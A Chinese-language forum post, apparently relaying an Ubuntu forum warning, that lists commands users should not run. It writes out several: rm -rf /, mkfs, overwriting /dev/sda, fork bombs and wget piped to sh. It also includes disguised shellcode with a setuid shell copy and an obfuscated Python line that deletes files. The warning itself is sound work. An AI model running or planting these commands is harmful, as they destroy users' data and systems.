最近Ubuntu官方论坛发出了官方通告, 列出下列危险命令, 告诫用户不要执行, 并对随意张贴下列命令的帐号处以直接封号的处罚.
再次声明, 请不要执行下列或类似下列的命令, 这些命令将会对你的计算机造成严重影响.
下列命令会删除所有文件, 删除当前目录, 删除当前目录下面的文件.
代码:
rm -rf /
rm -rf .
rm -rf *
下列命令会摧毁整个文件系统, 重建分区.
代码:
mkfs
mkfs.ext3
mkfs.anything
下列命令会清空整个硬盘.
代码:
any_command > /dev/sda
dd if=something ōf=/dev/sda
下列命令会启动大量进程, 导致系统无法响应, 只能硬重启机器, 可能会导致数据损害.
代码:
:(){:|:&};:
In Perl
代码:
fork while fork
不要执行你不信任的人提供的shell脚本, 里面可能含有危险的命令和脚本, 不要随意解压别人提供的压缩包, 也许看起来很小, 结果解压出来会塞满整个硬盘.
代码:
wget
sh ./some_file
代码:
wget -O- | sh
不要编译运行别人提供的不明代码
代码:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.
Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!
For example, 30 seconds in Python yields something like this:
代码:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'